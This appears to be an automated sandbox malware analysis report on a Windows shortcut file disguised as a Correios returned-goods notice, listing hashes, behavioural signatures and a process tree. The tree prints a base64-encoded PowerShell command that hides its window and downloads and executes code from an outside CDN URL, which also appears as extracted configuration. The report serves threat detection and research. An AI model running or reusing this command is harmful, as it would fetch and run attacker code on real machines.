Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
13-06-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
Mercadoria_Devolvida-Correios-H0C42E2H.lnk
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
Mercadoria_Devolvida-Correios-H0C42E2H.lnk
Resource
win10v2004-20240508-en
General
-
Target
Mercadoria_Devolvida-Correios-H0C42E2H.lnk
-
Size
3KB
-
MD5
246e74b6fffb9d5994f7f70bb6509b45
-
SHA1
4b7bdf4808ce987b9f94ea40bdd081217867483a
-
SHA256
0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
-
SHA512
178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted
https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2748 powershell.exe 4 2748 powershell.exe 5 2748 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2748 powershell.exe 2748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2748 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2480 wrote to memory of 2748 2480 cmd.exe 29 PID 2480 wrote to memory of 2748 2480 cmd.exe 29 PID 2480 wrote to memory of 2748 2480 cmd.exe 29 PID 2748 wrote to memory of 2944 2748 powershell.exe 30 PID 2748 wrote to memory of 2944 2748 powershell.exe 30 PID 2748 wrote to memory of 2944 2748 powershell.exe 30 PID 2944 wrote to memory of 2560 2944 csc.exe 31 PID 2944 wrote to memory of 2560 2944 csc.exe 31 PID 2944 wrote to memory of 2560 2944 csc.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vaotr-rh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2251.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2250.tmp"4⤵PID:2560
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54d3d7cb4bc4ed06b00551335e61f724f
SHA114416124515d673af368d23a5fe63e95bb857778
SHA256192ce989995a2c53d6fbc3a99c5203528b68ea9178e47d0ab65a94e9b4f8c143
SHA51208ed498642cbf8742a2274175a25df17496d4c84b118febcff68eb21a16fd182d75322d42a0e2e88d6e5b696b8b5f7823644df942c47521c5bf244e896846bf6
-
Filesize
3KB
MD5519f0f8988678e2d402c51e0599a04d7
SHA14a75e96d4a821ca721c85d574a187bfd50ca62a0
SHA2561d9a8f5011c76464941831f04933d57367c8e109de7b876667b3118c52ef1b01
SHA512a32f8225001b78ddf9e8a669df920213b7a36b96a7cfa52caed7b15588f8f4a1ce49a051ddaf481a4a32dd4e0a7e5bba5f6cabe34cc79f7e85adcd9e860541a2
-
Filesize
7KB
MD5dfd498ea7e752d5186c7e0e20e23324c
SHA1a5014734774e36a917097d320c826328b47a3f6a
SHA2561a595fe7a0c2ec07c5689ed4196c7448121a5a4824cd2d0153c98bfadcb7d748
SHA5127c6a7638a5c49a0cd1919ff53bcd3d478f7eb1b268381cdd1e13d1a4ded2cb3d342b924702fcf9d55cef3ea289f1eda77d62a14c295d7f89002d16a866959e65
-
Filesize
652B
MD59053cace7763f13f477946bdf6264ec4
SHA1c4607d0d3064e64f6cfe155cce87b1708dc5946c
SHA256d20ac6c682187207ea711de5d029711a87c150d2fa145764630d6dc09a37468f
SHA51297ddf59ec90a6ca55c8862e57be9f42afb815cf0763c2126cd92355c836506b50294bd074e60510707f65d230273fab3776d210af1c42db3d1afdde94780c59d
-
Filesize
187B
MD57b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA2566caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA5127322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
-
Filesize
309B
MD5c9c37412c4e78ea0e0ca3395102689a0
SHA121688e857f03f11852a99da078f9125ba42f2110
SHA25608ea5275ed60fb83fd7485f72ce364b874242c37a17683225fc64849748cb506
SHA512a1f9ad50d2b27c8700cd28af0c05cb7a67ef9a1b438289466c4c867fbf3a3a6bd8348eb59148d3c187fa8f6873fe4bf53baa5714d7d6614ada96a8d399beeed0